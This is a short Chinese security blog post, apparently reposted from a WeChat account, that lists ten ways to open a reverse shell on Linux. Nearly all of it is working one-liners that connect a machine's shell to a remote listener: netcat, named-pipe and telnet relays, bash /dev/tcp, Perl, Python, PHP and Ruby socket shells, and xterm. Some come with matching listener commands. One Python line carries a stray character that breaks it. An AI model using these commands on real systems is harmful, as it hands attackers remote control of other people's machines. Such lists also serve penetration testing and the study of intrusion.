Linux下反弹的10种方法

  • A+
所属分类:安全闲碎

方法1.
SHELL执行: nc 192.168.1.133 8080 -e /bin/bash
监听执行  :nc -n -vv -l -p 8080

方法2:
SHELL执行:mknod backpipe p && nc 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
监听执行: nc -n -vv -l -p 8080

方法3:
SHELL执行:mknod backpipe p && telnet 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
监听执行:nc -n -vv -l -p 8080

方法4:
SHELL执行:
telnet 127.0.0.1 8080 | /bin/bash | telnet 127.0.0.1 8888
监听执行:
nc -n -vv -l -p 8888

方法5:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

方法6:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

方法7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connec?t(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

方法8:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

方法9:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

方法10:
xterm -display 10.0.0.1:1

本文始发于微信公众号(T00ls):Linux下反弹的10种方法

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: